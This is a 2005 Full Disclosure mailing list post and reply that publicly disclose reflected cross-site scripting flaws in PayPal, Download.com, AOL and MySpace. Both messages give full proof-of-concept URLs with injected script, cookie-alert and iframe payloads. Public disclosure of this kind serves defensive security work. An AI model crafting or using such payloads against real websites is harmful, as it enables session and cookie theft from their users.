Full Disclosure mailing list archives
Re: Big Sites That Are Vulnerable To XSS
From: "Morning Wood" <se_cur_ity () hotmail com>
Date: Wed, 20 Apr 2005 23:52:20 -0700
toss this one in... http://www.myspace.com/index.cfm?fuseaction=find&circuitaction=search&searchType=network&interesttype=&f_first_name=<iframe src="http://whatismyip.com"></iframe>&Submit=Find i think redirects are more effective in showing xss, but cookies are nice too or other xss like <SCRIPT>alert(document.cookie);</SCRIPT> wood ----- Original Message ----- From: <tuytumadre () att net> To: <full-disclosure () lists grok org uk> Sent: Wednesday, April 20, 2005 9:19 PM Subject: [Full-disclosure] Big Sites That Are Vulnerable To XSS
The following have been previously reposibly disclosed, and, because of
the lack of action taken on the venders' parts, full disclosure is necessary to elliminate the threat of what's called "security by obscurity."
paypal.com
http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/accounts-outside--><script>alert(document.cookie)</script><!--
download.com
http://www.download.com/2001-20_4-0.html?tag=tabasdf"--><script>alert(document.cookie)</script><!--
aol.com*
https://my.screenname.aol.com/snsHomePage.psp?hpClickedOn=null&sitedomain=my.screenname.aol.com";}%20{%20alert(document.cookie);%20//&authLev=2&siteState=&isSiteStateEncoded=false&lang=en&locale=us&mcAuth=%2FBcAG0Jd4zsAAK80AY99uEJd43cIgAwNtLp%2BJCQAAA%3D%3D
*on aol.com, the victim must be logged in to the website screenname
service to be vulnerable.
Regards, Paul Greyhats Security http://greyhatsecurity.org
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Big Sites That Are Vulnerable To XSS tuytumadre (Apr 20)
- Re: Big Sites That Are Vulnerable To XSS Morning Wood (Apr 20)
- Re: Big Sites That Are Vulnerable To XSS Jerome ATHIAS (Apr 21)
- Re: Big Sites That Are Vulnerable To XSS Dominik Birk (Apr 27)